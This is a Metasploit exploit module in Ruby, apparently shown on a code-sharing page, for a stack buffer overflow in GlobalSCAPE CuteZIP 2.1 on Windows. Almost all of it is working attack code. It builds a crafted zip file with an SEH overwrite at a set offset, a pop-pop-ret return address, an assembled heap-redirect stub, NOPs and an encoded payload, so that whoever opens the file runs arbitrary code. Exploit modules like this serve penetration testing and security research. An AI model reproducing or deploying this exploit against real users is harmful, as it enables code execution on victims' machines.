Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/zip'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = NormalRanking
10

11
  include Msf::Exploit::FILEFORMAT
12
  include Msf::Exploit::Remote::Seh
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'GlobalSCAPE CuteZIP Stack Buffer Overflow',
17
      'Description'    => %q{
18
          This module exploits a stack-based buffer overflow vulnerability in version 2.1
19
        of CuteZIP.
20

21
        In order for the command to be executed, an attacker must convince the target user
22
        to open a specially crafted zip file with CuteZIP. By doing so, an attacker can
23
        execute arbitrary code as the target user.
24
      },
25
      'License'        => MSF_LICENSE,
26
      'Author'         =>
27
        [
28
          'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Initial discovery, poc
29
          'juan vazquez' # Metasploit
30
        ],
31
      'References'     =>
32
        [
33
          [ 'OSVDB', '85709' ],
34
          [ 'EDB', '16162' ],
35
          [ 'BID', '46375' ]
36
        ],
37
      'Platform'          => [ 'win' ],
38
      'Payload'           =>
39
        {
40
          'BadChars'    => "",
41
          'DisableNops' => true,
42
          'Space' => 3000 # Limit due to the heap chunk size where the payload is stored
43
        },
44
      'Targets'        =>
45
        [
46
          [
47
            # Tested successfully on:
48
            # * Windows XP SP3
49
            # * Windows Vista SP2
50
            # * Windows 7 SP1
51
            # (NO DEP)
52
            'CuteZIP 2.1 / Windows Universal',
53
            {
54
              'Ret'         => 0x0040112F, # pop, pop, ret from CuteZIP.exe
55
              'Offset'      => 1148,
56
              'Nops'        => 398
57
            }
58
          ],
59
        ],
60
      'DisclosureDate' => '2011-02-12',
61
      'DefaultTarget'  => 0))
62

63
    register_options(
64
      [
65
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip'])
66
      ])
67

68
  end
69

70
  def exploit
71

72
    redirect_heap = <<-ASM
73
      popad
74
      popad
75
      popad
76
      push ecx
77
      pop eax
78
      call eax
79
    ASM
80

81
    crafted_file = rand_text(target['Offset'])
82
    crafted_file << generate_seh_record(target.ret)
83
    crafted_file << Metasm::Shellcode.assemble(Metasm::Ia32.new, redirect_heap).encode_string
84
    crafted_file << make_nops(1) * target['Nops']
85
    crafted_file << payload.encoded
86

87
    # Create the file
88
    zip = Rex::Zip::Archive.new
89
    xtra = rand_text(4)
90
    zip.add_file(crafted_file, xtra)
91

92
    print_status("Creating '#{datastore['FILENAME']}' file...")
93
    file_create(zip.pack)
94
  end
95
end
96

97